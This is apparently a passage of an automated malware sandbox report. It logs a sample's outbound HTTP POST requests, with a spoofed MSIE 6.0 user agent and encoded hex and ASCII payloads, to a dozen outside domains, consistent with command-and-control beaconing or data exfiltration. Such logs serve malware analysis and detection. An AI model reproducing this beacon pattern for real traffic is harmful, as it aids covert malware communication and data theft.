DrpuRls8xHHJaudfckVVGES3dEjhzVIevzuY5zNGLHiQfWwCvBWyPD+uQGwdQSj9e8Ih7/z/TZFJtLO03ZcR8asqTnvVJ+8n/+QUBKpsWKgAwKOu/XPRdB+yvCBGFfJKlUp8YA6mL5G2uEXw6dS5zKg4U22gwZjNY1lWvF1hm8HG0a4owFRwTQD1zXP+biTLL5w/qdxWkX2oSPwx/MkTn0aWl8MduI8I00yWMSTxg5jbN4i3CQ4T8VscoG8XpvtrYPUvFpPv6hMoMDl+HqKWpTDRzB1ZyuLvxWJ57E9bZzuJuV1FHYt2Od46mvGT2DkAIAGDDEEtL/OrQXeEt1/rHiKafIX2TrfJgYJVgWOtJSC0LGpbUFKrA/Dz4SgqTS8xs0LbZSEsutNIL+VxXjlZ4AEwBq6m7wjTpwVXhum26HyE7KGh8nTwdXS8FQy44kyGMCXUhyotnaya20tBOCXk0Kac8YADox95zIKxfrd/tOikZns2WVMz/WdWUUtbru/2dVY61daUPFxsnaPHHOjTg90aFWC3eEl1kUkpk93ImSJ59pGacfVmLk2jEttqHIPxp3yFdeSUgUNEEewHLdE3iz0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 752User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ifesnet.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 72 32 42 4b 55 63 6c 76 33 43 4c 55 63 6c 76 33 43 4c 58 67 73 55 65 6f 78 35 45 4e 57 65 6f 78 36 46 4f 58 67 71 7a 38 49 52 61 6b 75 33 43 4c 55 64 6d 78 36 46 4f 58 68 72 30 39 49 52 61 44 52 62 6b 75 33 43 4c 55 64 6d 77 35 46 4f 58 67 71 7a 38 48 51 5a 69 75 33 43 4c 56 65 6d 77 35 46 4f 58 67 71 7a 38 4a 53 62 6b 75 35 46 4f 58 67 72 31 41 4a 53 64 6d 77 35 49 52 61 6a 74 32 42 4b 56 67 71 7a 38 49 52 61 6a 74 32 42 4b 55 64 6d 77 35 45 4e 57 67 71 7a 39 49 52 64 6d 77 35 45 4e 57 66 70 79 37 47 50 61 6a 74 32 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4c 55 64 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 32 42 4b 54 63 6c 76 34 44 4d 55 64 6d 78 36 46 4f 58 67 71 7a 38 48 51 62 6c 77 33 47 51 61 6a 74 33 43 4c 55 64 6d 77 36 46 52 61 62 6c 76 34 44 4e 5a 6f 30 43 51 63 6f 7a 42 4f 61 6d 79 41 4d 59 6c 79 41 4d 59 6b 78 39 4b 58 69 76 37 49 55 6a 78 38 4b 57 6b 77 32 43 4c 55 66 71 7a 38 48 54 63 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 78 36 46 4f 58 68 72 32 42 4c 55 64 6d 77 35 45 4e 57 66 70 31 4d 64 70 7a 38 48 67 75 33 43 4c 55 66 72 34 47 55 67 75 35 49 54 67 74 35 47 52 65 74 34 47 53 66 73 34 46 52 65 73 34 46 54 65 71 34 47 52 65 73 34 47 55 66 73 34 46 53 66 73 34 47 53 64 72 32 45 52 64 70 31 45 51 62 70 30 43 4f 61 6d 79 42 4e 59 6c 79 39 4d 58 6c 79 43 4e 61 6d 31 44 50 61 6f 7a 43 4f 61 6d 7a 43 4e 5a 6c 79 41 4d 59 6a 77 38 4b 58 6a 77 38 4b 57 68 77 37 4b 56 68 75 36 49 54 66 73 34 46 53 65 73 34 47 53 65 72 33 46 52 63 71 32 45 51 62 6f 30 43 4f 61 6d 7a 41 4e 59 6b 77 39 4b 58 6a 77 38 4c 57 69 75 37 4a 56 69 75 36 48 55 66 74 34 47 57 68 75 36 49 55 67 74 35 48 54 67 74 35 47 53 65 72 33 46 52 64 71 33 46 52 64 71 32 45 52 64 71 32 45 50 63 70 30 44 4f 61 6f 31 44 52 64 71 32 45 51 63 70 31 45 52 63 71 31 44 4f 62 6d 7a 42 4e 5a 6c 79 41 4c 58 6a 77 37 4b 57 68 76 36 49 56 67 74 35 49 54 67 76 36 4a 56 68 76 4d 63 70 31 45 51 63 6f 30 43 4f 61 6d 79 41 4d 59 6b 77 38 4b 57 68 75 35 48 55 66 73 33 47 53 65 72 33 45 52 63 70 30 44 50 61 6d 7a 43 4f 62 6d 30 42 4e 59 6c 78 38 4b 57 68 75 36 49 54 67 73 34 47 53 65 71 33 46 52 63 70 31 44 4e 57 66 70 79 37 47 50 59 68 72 30 39 4a 53 62 6b 38 4c 55 64 6d 78 36 46 Data Ascii: r2BKUclv3CLUclv3CLXgsUeox5ENWeox6FOXgqz8IRaku3CLUdmx6FOXhr09IRaDRbku3CLUdmw5FOXgqz8HQZiu3CLVemw5FOXgqz8JSbku5FOXgr1AJSdmw5IRajt2BKVgqz8IRajt2BKUdmw5ENWgqz9IRdmw5ENWfpy7GPajt2CLUdmw5ENWfpy7GPYhr09IRajt2BLUdox6FOXgqz8HQZis2BKTclv4DMUdmx6FOXgqz8HQblw3GQajt3CLUdmw6FRablv4DNZo0CQcozBOamyAMYlyAMYkx9KXiv7IUjx8KWkw2CLUfqz8HTcmw5ENWfpy7GPYhr1AJSbku3CLUdmx6FOXhr2BLUdmw5ENWfp1Mdpz8Hgu3CLUfr4GUgu5ITgt5GRet4GSfs4FRes4FTeq4GRes4GUfs4FSfs4GSdr2ERdp1EQbp0COamyBNYly9MXlyCNam1DPaoz
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1784User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: k-nikko.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 42 69 7a 5a 55 53 65 49 57 48 48 39 67 47 39 47 31 6d 66 38 6a 2f 41 4d 4f 44 57 64 30 38 53 37 53 77 5a 6f 65 74 38 37 4d 44 4a 78 2b 4b 31 35 34 6b 4d 6b 63 6b 71 52 37 76 39 75 59 52 72 4e 4b 48 5a 6b 55 6b 35 6b 4d 65 75 72 2b 76 41 54 58 48 34 5a 67 4e 38 70 77 6d 4f 6d 68 57 4a 52 77 67 6b 47 39 6f 4d 36 73 74 46 2f 36 66 4d 77 4c 6f 61 54 33 78 42 61 44 65 75 50 45 4c 34 59 5a 78 4b 58 62 45 39 6f 2b 4f 78 74 4b 49 7a 55 70 70 2b 61 4c 4a 37 4e 31 33 73 54 36 73 73 72 55 68 56 58 4d 52 6c 6e 4c 64 31 51 5a 43 44 39 6c 4d 61 78 7a 47 36 57 55 38 35 4e 41 2f 46 56 39 77 7a 75 56 6c 4a 6d 50 57 44 51 4b 72 4c 4f 45 31 79 43 4a 4a 55 48 43 67 57 68 46 74 37 6d 74 33 77 45 36 53 36 32 50 4d 33 32 43 50 37 42 42 50 32 78 68 66 59 34 4e 76 54 70 4e 41 66 53 77 62 30 6e 6d 31 52 4d 6c 67 48 32 69 6a 6c 34 55 36 50 75 4f 75 74 63 35 4b 52 4e 2b 78 37 43 70 61 54 70 54 65 48 34 6a 72 31 4e 4c 72 68 52 4d 43 4e 5a 30 63 76 66 52 30 79 56 52 6e 59 43 69 43 2f 4c 39 65 76 55 70 58 49 74 6a 5a 50 4c 71 6e 6b 67 59 4b 57 7a 2b 2f 51 6f 4c 36 79 75 33 54 37 56 6b 74 53 56 62 44 7a 78 72 39 41 55 74 38 34 2f 47 49 63 68 64 36 39 50 4e 61 52 76 68 6a 6d 31 74 73 6a 75 6f 77 5a 50 66 66 4c 44 63 55 6e 63 52 6e 70 30 50 4e 47 71 54 73 39 76 53 2f 5a 50 64 4a 33 48 79 53 37 55 55 4b 6d 64 43 77 4d 7a 4e 68 56 72 34 37 77 52 4d 6a 4e 65 49 43 6b 59 58 63 2b 76 52 72 59 4c 66 44 54 6f 37 6b 39 57 6a 51 31 78 4f 52 56 4b 34 38 61 33 39 31 52 4b 39 72 57 62 4d 75 75 4e 72 31 79 6e 36 76 63 66 2f 5a 50 6c 62 63 4f 43 78 58 68 51 66 78 4b 41 36 31 55 48 33 68 4e 34 59 6d 35 52 43 49 6a 4a 2b 2b 4b 4d 45 4a 62 53 52 42 57 55 47 30 37 6c 52 51 66 74 77 6a 4b 54 68 4d 4e 59 4e 51 38 52 6f 74 76 34 53 48 48 5a 69 72 66 6d 47 51 66 74 49 39 38 58 69 67 3d 3d Data Ascii: BizZUSeIWHH9gG9G1mf8j/AMODWd08S7SwZoet87MDJx+K154kMkckqR7v9uYRrNKHZkUk5kMeur+vATXH4ZgN8pwmOmhWJRwgkG9oM6stF/6fMwLoaT3xBaDeuPEL4YZxKXbE9o+OxtKIzUpp+aLJ7N13sT6ssrUhVXMRlnLd1QZCD9lMaxzG6WU85NA/FV9wzuVlJmPWDQKrLOE1yCJJUHCgWhFt7mt3wE6S62PM32CP7BBP2xhfY4NvTpNAfSwb0nm1RMlgH2ijl4U6PuOutc5KRN+x7CpaTpTeH4jr1NLrhRMCNZ0cvfR0yVRnYCiC/L9evUpXItjZPLqnkgYKWz+/QoL6yu3T7VktSVbDzxr9AUt84/GIchd69PNaRvhjm1tsjuowZPffLDcUncRnp0PNGqTs9vS/ZPdJ3HyS7UUKmdCwMzNhVr47wRMjNeICkYXc+vRrYLfDTo7k9WjQ1xORVK48a391RK9rWbMuuNr1yn6vcf/ZPlbcOCxXhQfxKA61UH3hN4Ym5RCIjJ++KMEJbSRBWUG07lRQftwjKThMNYNQ8Rotv4SHHZirfmGQftI98Xig==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 996User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ruzee.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=amuvqzixxlrkwopttphdmfdzewvulswhData Raw: 69 54 71 66 50 6d 72 37 77 33 45 49 61 62 45 50 54 66 50 6f 70 69 30 34 4f 31 57 61 42 2b 72 58 50 73 54 78 67 61 31 74 72 39 4a 63 42 5a 36 50 4a 41 68 6d 6f 7a 4d 69 77 6c 61 64 77 4f 65 6c 43 58 63 61 36 42 41 6b 52 54 70 77 41 2f 32 47 64 71 50 34 66 4b 43 30 70 52 76 56 33 57 64 46 58 71 35 2f 50 34 65 77 52 71 38 38 49 61 32 4f 72 6b 2b 6c 34 77 65 6a 78 6d 37 75 36 39 54 31 4f 36 56 4f 47 43 37 4f 72 4d 42 63 50 58 4b 38 38 4e 50 41 77 74 7a 45 42 69 69 5a 5a 75 6f 5a 54 6d 56 31 30 45 34 39 37 73 71 6b 50 39 76 54 4b 6a 79 59 67 59 61 6b 62 39 59 44 2f 67 2b 2b 62 42 50 49 4c 46 4d 63 59 71 6e 70 71 37 48 73 38 4c 72 77 73 74 41 2b 6a 72 77 75 46 6c 76 72 4d 61 5a 69 31 36 72 77 44 70 79 53 51 69 53 49 6e 4b 4a 7a 32 4b 4b 31 6e 4e 64 36 4f 68 69 64 56 6f 45 4a 6b 69 41 68 77 57 4f 44 71 4d 30 33 58 49 41 4f 37 55 79 5a 69 54 4a 47 5a 68 36 46 53 7a 43 77 64 74 44 5a 42 66 36 52 79 4e 67 4e 48 57 30 54 4f 38 44 68 30 46 31 42 4d 7a 6f 34 69 74 51 32 42 53 41 41 69 39 74 5a 37 50 70 67 70 64 2b 6c 4c 36 69 77 75 48 48 5a 35 4b 31 6a 2b 31 51 7a 58 31 37 39 34 48 49 76 6d 6d 61 30 59 43 6a 4f 53 43 36 33 34 78 2f 5a 54 66 71 6b 2b 46 32 32 57 41 65 41 68 32 38 66 64 46 30 69 54 43 6c 30 6a 6f 4a 63 48 53 4d 45 6e 46 43 4b 39 4e 2f 37 30 50 67 50 4e 2f 7a 2f 4d 56 45 53 57 44 42 6f 54 59 6c 77 35 5a 56 63 7a 31 6d 70 41 54 54 51 4b 4d 72 65 78 6b 62 56 6b 49 79 78 4c 71 66 45 4d 78 49 73 75 33 64 68 38 38 36 37 57 63 70 43 38 68 62 4a 4f 6d 72 6a 6e 33 38 6d 2f 47 57 47 71 6e 36 4c 71 78 44 62 42 50 6c 68 37 34 54 65 36 66 78 74 48 6e 2f 54 59 49 6c 35 68 61 4a 35 6d 6e 2b 65 65 6f 4d 30 66 52 64 57 45 45 4f 56 49 78 74 43 2b 2f 43 72 38 41 47 35 71 7a 62 51 78 78 66 6c 52 64 38 70 6e 54 79 5a 6a 55 76 4d 42 4f 64 61 6b 39 39 66 43 6c 38 3d Data Ascii: iTqfPmr7w3EIabEPTfPopi04O1WaB+rXPsTxga1tr9JcBZ6PJAhmozMiwladwOelCXca6BAkRTpwA/2GdqP4fKC0pRvV3WdFXq5/P4ewRq88Ia2Ork+l4wejxm7u69T1O6VOGC7OrMBcPXK88NPAwtzEBiiZZuoZTmV10E497sqkP9vTKjyYgYakb9YD/g++bBPILFMcYqnpq7Hs8LrwstA+jrwuFlvrMaZi16rwDpySQiSInKJz2KK1nNd6OhidVoEJkiAhwWODqM03XIAO7UyZiTJGZh6FSzCwdtDZBf6RyNgNHW0TO8Dh0F1BMzo4itQ2BSAAi9tZ7Ppgpd+lL6iwuHHZ5K1j+1QzX1794HIvmma0YCjOSC634x/ZTfqk+F22WAeAh28fdF0iTCl0joJcHSMEnFCK9N/70PgPN/z/MVESWDBoTYlw5ZVcz1mpATTQKMrexkbVkIyxLqfEMxIsu3dh8867WcpC8hbJOmrjn38m/GWGqn6LqxDbBPlh74Te6fxtHn/TYIl5haJ5mn+eeoM0fRdWEEOVIxtC+/Cr8AG5qzbQxxflRd8pnTyZjUvMBOdak99fCl8=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheCookie: city=""; expiry_partner=; caf_ipaddr=10.116.88.58; country=Data Raw: 53 32 6a 4f 4e 73 50 34 5a 53 65 44 7a 6e 4c 6f 79 6b 66 46 4b 4f 78 33 72 39 35 70 4e 6e 6e 34 70 34 70 65 62 71 50 68 2f 68 42 51 4e 78 59 70 78 76 49 48 48 76 6f 72 52 6d 67 58 48 59 41 72 4c 5a 65 32 2f 44 49 42 66 55 4c 46 70 41 50 47 52 51 6c 6c 78 6e 35 6a 4e 36 71 6b 46 4e 42 68 6a 4c 59 61 72 2f 64 64 58 45 47 41 50 2f 30 59 46 38 66 61 54 57 6c 59 2f 6c 72 53 77 58 66 37 54 62 78 72 30 76 6d 38 30 51 74 64 33 65 33 59 64 50 61 4f 4d 6a 78 64 58 30 63 76 4c 51 6b 5a 42 61 4b 72 62 75 2f 33 76 74 54 31 34 47 61 75 62 4c 30 68 64 59 42 74 55 76 70 65 63 58 55 6d 68 74 71 50 49 4a 4f 66 42 56 47 65 6a 37 73 75 67 61 6b 71 46 45 79 4a 53 35 4b 65 63 6b 72 4c 37 57 53 70 32 42 31 66 37 62 76 30 45 44 45 41 2b 6d 4e 69 5a 71 34 5a 77 5a 32 62 58 4f 37 62 69 77 6f 71 6a 67 6b 5a 68 71 6d 70 6f 4e 32 6f 4c 36 6e 59 69 4e 34 42 4e 68 2f 2b 52 53 6b 59 46 44 4d 43 45 6e 2b 57 71 36 64 34 32 63 52 61 32 4b 65 45 72 42 51 68 66 58 4c 52 5a 38 76 62 70 4a 65 50 4b 36 71 48 2b 75 53 44 41 54 41 61 77 74 58 42 41 33 68 6e 6f 4e 73 48 41 52 4e 39 42 76 58 6f 54 69 47 52 64 45 4e 41 31 6e 69 6d 47 6e 35 46 6e 65 4e 78 35 32 37 75 6c 31 37 47 4d 57 35 64 44 42 73 4c 43 53 32 6c 79 52 2f 46 6f 55 33 51 49 53 53 5a 64 4b 51 69 33 48 30 62 63 79 57 6c 43 46 31 6f 2b 66 6a 4e 74 79 58 4a 46 74 6d 66 31 35 49 52 41 6e 6d 2f 32 71 68 57 6a 4c 48 6e 63 56 56 44 6d 41 41 35 75 35 73 36 4e 75 70 2f 52 57 72 6c 69 71 62 70 54 36 78 6b 41 45 51 44 49 58 52 75 5a 36 57 77 6a 38 68 48 46 31 55 68 31 68 51 68 6d 58 39 52 58 64 43 71 6e 33 68 6b 57 54 38 50 39 30 41 42 37 58 4c 73 35 6a 64 47 6c 34 2f 42 43 76 77 54 33 68 45 4a 48 35 71 69 55 4e 35 67 63 42 78 4b 78 33 65 2f 32 55 68 5a 70 47 44 46 63 78 38 56 6c 69 6e 33 52 6e 62 61 Data Ascii: S2jONsP4ZSeDznLoykfFKOx3r95pNnn4p4pebqPh/hBQNxYpxvIHHvorRmgXHYArLZe2/DIBfULFpAPGRQllxn5jN6qkFNBhjLYar/ddXEGAP/0YF8faTWlY/lrSwXf7Tbxr0vm80Qtd3e3YdPaOMjxdX0cvLQkZBaKrbu/3vtT14GaubL0hdYBtUvpecXUmhtqPIJOfBVGej7sugakqFEyJS5KeckrL7WSp2B1f7bv0EDEA+mNiZq4ZwZ2bXO7biwoqjgkZhqmpoN2oL6nYiN4BNh/+RSkYFDMCEn+Wq6d42cRa2KeErBQhfXLRZ8vbpJePK6qH+uSDATAawtXBA3hnoNsHARN9BvXoTiGRdENA1nimGn5FneNx527ul17GMW5dDBsLCS2lyR/FoU3QISSZdKQi3H0bcyWlCF1o+fjNtyXJFtmf15IRAnm/2qhWjLHncVVDmAA5u5s6Nup/RWrliqbpT6xkAEQDIXRuZ6Wwj8hHF1Uh1hQhmX9RXdCqn3hkWT8P90AB7XLs5jdGl4/BCvwT3hEJH5qiUN5gcBxKx3e/2UhZpGDFcx8Vlin3Rnba
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1358User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mjrcpas.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 832User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ascc.org.auConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 644User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: lyto.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 39 53 66 74 36 4b 57 6a 33 4a 61 6f 7a 4b 64 31 47 5a 71 43 58 74 44 56 72 42 55 70 37 51 69 31 48 59 79 4a 66 32 50 6a 37 55 71 42 53 6f 34 4b 64 79 4a 63 79 47 5a 70 36 46 4f 58 67 71 7a 38 48 52 61 6a 74 32 42 4b 54 67 70 35 52 6c 36 51 6c 34 4c 65 33 4d 67 34 50 6b 34 4e 67 79 47 59 74 45 59 6c 36 58 79 48 62 78 46 58 75 43 4e 6b 37 53 69 38 53 70 42 55 70 43 59 72 41 54 6f 41 52 6c 37 53 70 39 4c 64 77 46 62 7a 4b 6a 34 46 63 79 45 61 77 46 59 74 45 57 72 42 57 72 41 56 72 36 50 67 79 49 63 7a 4b 64 78 49 63 7a 4a 63 77 47 63 6f 42 57 6f 37 50 6b 35 50 6a 37 55 72 38 50 69 34 50 6a 32 4c 69 7a 49 62 76 45 58 72 43 62 77 45 58 72 41 54 6f 38 52 6b 35 50 68 34 54 73 44 57 72 34 49 61 6f 39 57 74 47 61 76 45 59 74 43 58 72 43 58 73 42 58 73 41 56 72 43 55 6f 36 52 6b 36 50 6b 34 4f 69 34 52 70 36 51 6a 37 53 6d 35 4a 58 6d 43 51 65 76 4c 68 36 57 6a 31 4d 67 31 4c 67 31 4d 67 30 4b 66 74 37 4c 64 78 41 4f 66 78 4a 64 31 4a 62 76 47 61 78 4a 5a 74 43 56 74 45 57 71 41 58 73 42 54 70 41 57 72 45 58 72 43 57 71 45 59 6d 34 52 70 46 59 73 45 53 6b 35 50 6c 35 4e 6a 32 4c 6a 34 51 69 33 4d 69 34 54 73 44 61 73 46 64 35 4f 6b 38 56 76 42 56 71 41 57 71 39 55 73 42 57 74 47 62 73 42 57 73 38 55 74 41 54 73 42 56 71 41 55 72 42 54 68 33 48 61 75 48 61 7a 48 61 76 4a 64 31 4e 65 75 47 63 79 4c 6b 35 53 71 38 5a 73 45 5a 77 49 66 30 4a 67 32 4b 64 79 45 58 72 46 58 72 45 61 76 49 61 72 39 53 6b 36 4f 67 32 4d 69 33 4c 58 75 39 4e 62 70 39 50 6c 34 4e 67 79 49 66 31 4d 67 31 4a 63 79 4a 5a 74 45 5a 73 43 51 65 73 43 63 33 57 6f 36 51 6c 35 53 6a 30 4b 65 32 4e 68 34 4f 6b 38 53 6d 38 54 6f 37 52 6c 39 54 6f 38 53 6d 39 57 71 42 56 73 44 58 73 43 57 70 38 52 6b 39 57 75 42 54 72 42 57 73 44 5a 71 44 59 75 45 62 71 37 54 70 42 54 6c 36 50 6a 35 51 69 34 4c 64 7a 4a 63 78 46 5a 76 46 5a 75 45 58 72 34 4c 6a 30 46 5a 73 44 59 6d 31 4f 68 33 4f 68 30 45 57 79 49 64 77 47 64 78 47 5a 76 45 59 73 45 58 73 44 59 73 Data Ascii: 9Sft6KWj3JaozKd1GZqCXtDVrBUp7Qi1HYyJf2Pj7UqBSo4KdyJcyGZp6FOXgqz8HRajt2BKTgp5Rl6Ql4Le3Mg4Pk4NgyGYtEYl6XyHbxFXuCNk7Si8SpBUpCYrAToARl7Sp9LdwFbzKj4FcyEawFYtEWrBWrAVr6PgyIczKdxIczJcwGcoBWo7Pk5Pj7Ur8Pi4Pj2LizIbvEXrCbwEXrATo8Rk5Ph4TsDWr4Iao9WtGavEYtCXrCXsBXsAVrCUo6Rk6Pk4Oi4Rp6Qj7Sm5JXmCQevLh6Wj1Mg1Lg1Mg0Kft7LdxAOfxJd1JbvGaxJZtCVtEWqAXsBTpAWrEXrCWqEYm4RpFYsESk5Pl5Nj2Lj4Qi3Mi4TsDasFd5Ok8VvBVqAWq9UsBWtGbsBWs8UtATsBVqAUrBTh3HauHazHavJd1NeuGcyLk5Sq8ZsEZwIf0Jg2KdyEXrFXrEavIar9Sk6Og2Mi3LXu9Nbp9Pl4NgyIf1Mg1JcyJZtEZsCQesCc3Wo6Ql5Sj0Ke2Nh4Ok8Sm8To7Rl9To8Sm9WqBVsDXsCWp8Rk9WuBTrBWsDZqDYuEbq7TpBTl6Pj5Qi4LdzJcxFZvFZuEXr4Lj0FZsDYm1Oh3Oh0EWyIdwGdxGZvEYsEXsDYs
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1253User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: cvswl.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 861User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: semuk.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheCookie: city=""; expiry_partner=; caf_ipaddr=10.116.88.58; country=Data Raw: 53 32 6a 4f 4e 73 50 34 5a 53 65 44 7a 6e 4c 6f 79 6b 66 46 4b 4f 78 33 72 39 35 70 4e 6e 6e 34 70 34 70 65 62 71 50 68 2f 68 42 51 4e 78 59 70 78 76 49 48 48 76 6f 72 52 6d 67 58 48 59 41 72 4c 5a 65 32 2f 44 49 42 66 55 4c 46 70 41 50 47 52 51 6c 6c 78 6e 35 6a 4e 36 71 6b 46 4e 42 68 6a 4c 59 61 72 2f 64 64 58 45 47 41 50 2f 30 59 46 38 66 61 54 57 6c 59 2f 6c 72 53 77 58 66 37 54 62 78 72 30 76 6d 38 30 51 74 64 33 65 33 59 64 50 61 4f 4d 6a 78 64 58 30 63 76 4c 51 6b 5a 42 61 4b 72 62 75 2f 33 76 74 54 31 34 47 61 75 62 4c 30 68 64 59 42 74 55 76 70 65 63 58 55 6d 68 74 71 50 49 4a 4f 66 42 56 47 65 6a 37 73 75 67 61 6b 71 46 45 79 4a 53 35 4b 65 63 6b 72 4c 37 57 53 70 32 42 31 66 37 62 76 30 45 44 45 41 2b 6d 4e 69 5a 71 34 5a 77 5a 32 62 58 4f 37 62 69 77 6f 71 6a 67 6b 5a 68 71 6d 70 6f 4e 32 6f 4c 36 6e 59 69 4e 34 42 4e 68 2f 2b 52 53 6b 59 46 44 4d 43 45 6e 2b 57 71 36 64 34 32 63 52 61 32 4b 65 45 72 42 51 68 66 58 4c 52 5a 38 76 62 70 4a 65 50 4b 36 71 48 2b 75 53 44 41 54 41 61 77 74 58 42 41 33 68 6e 6f 4e 73 48 41 52 4e 39 42 76 58 6f 54 69 47 52 64 45 4e 41 31 6e 69 6d 47 6e 35 46 6e 65 4e 78 35 32 37 75 6c 31 37 47 4d 57 35 64 44 42 73 4c 43 53 32 6c 79 52 2f 46 6f 55 33 51 49 53 53 5a 64 4b 51 69 33 48 30 62 63 79 57 6c 43 46 31 6f 2b 66 6a 4e 74 79 58 4a 46 74 6d 66 31 35 49 52 41 6e 6d 2f 32 71 68 57 6a 4c 48 6e 63 56 56 44 6d 41 41 35 75 35 73 36 4e 75 70 2f 52 57 72 6c 69 71 62 70 54 36 78 6b 41 45 51 44 49 58 52 75 5a 36 57 77 6a 38 68 48 46 31 55 68 31 68 51 68 6d 58 39 52 58 64 43 71 6e 33 68 6b 57 54 38 50 39 30 41 42 37 58 4c 73 35 6a 64 47 6c 34 2f 42 43 76 77 54 33 68 45 4a 48 35 71 69 55 4e 35 67 63 42 78 4b 78 33 65 2f 32 55 68 5a 70 47 44 46 63 78 38 56 6c 69 6e 33 52 6e 62 61 Data Ascii: S2jONsP4ZSeDznLoykfFKOx3r95pNnn4p4pebqPh/hBQNxYpxvIHHvorRmgXHYArLZe2/DIBfULFpAPGRQllxn5jN6qkFNBhjLYar/ddXEGAP/0YF8faTWlY/lrSwXf7Tbxr0vm80Qtd3e3YdPaOMjxdX0cvLQkZBaKrbu/3vtT14GaubL0hdYBtUvpecXUmhtqPIJOfBVGej7sugakqFEyJS5KeckrL7WSp2B1f7bv0EDEA+mNiZq4ZwZ2bXO7biwoqjgkZhqmpoN2oL6nYiN4BNh/+RSkYFDMCEn+Wq6d42cRa2KeErBQhfXLRZ8vbpJePK6qH+uSDATAawtXBA3hnoNsHARN9BvXoTiGRdENA1nimGn5FneNx527ul17GMW5dDBsLCS2lyR/FoU3QISSZdKQi3H0bcyWlCF1o+fjNtyXJFtmf15IRAnm/2qhWjLHncVVDmAA5u5s6Nup/RWrliqbpT6xkAEQDIXRuZ6Wwj8hHF1Uh1hQhmX9RXdCqn3hkWT8P90AB7XLs5jdGl4/BCvwT3hEJH5qiUN5gcBxKx3e/2UhZpGDFcx8Vlin3Rnba
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 106User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: fifa-ews.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6d 77 34 43 4b 53 5a 68 71 78 35 44 4b 53 61 69 71 79 36 45 4d 54 62 6a 72 7a 37 45 4d 55 62 6a 62 50 62 32 45 4d 54 62 6a 73 7a 37 46 4d 55 63 6a 73 30 37 46 4e 56 63 6b 74 31 38 47 4e 56 64 6b 74 31 39 47 4f 57 65 6c 75 32 41 48 50 58 65 6d 76 32 41 49 50 58 66 6d 76 33 41 49 51 58 66 6f 76 33 42 49 51 59 66 6f 77 Data Ascii: mw4CKSZhqx5DKSaiqy6EMTbjrz7EMUbjbPb2EMTbjsz7FMUcjs07FNVckt18GNVdkt19GOWelu2AHPXemv2AIPXfmv3AIQXfov3BIQYfow
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1327User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: 603888.comConnection: Keep-AliveCache-Control: no-cache
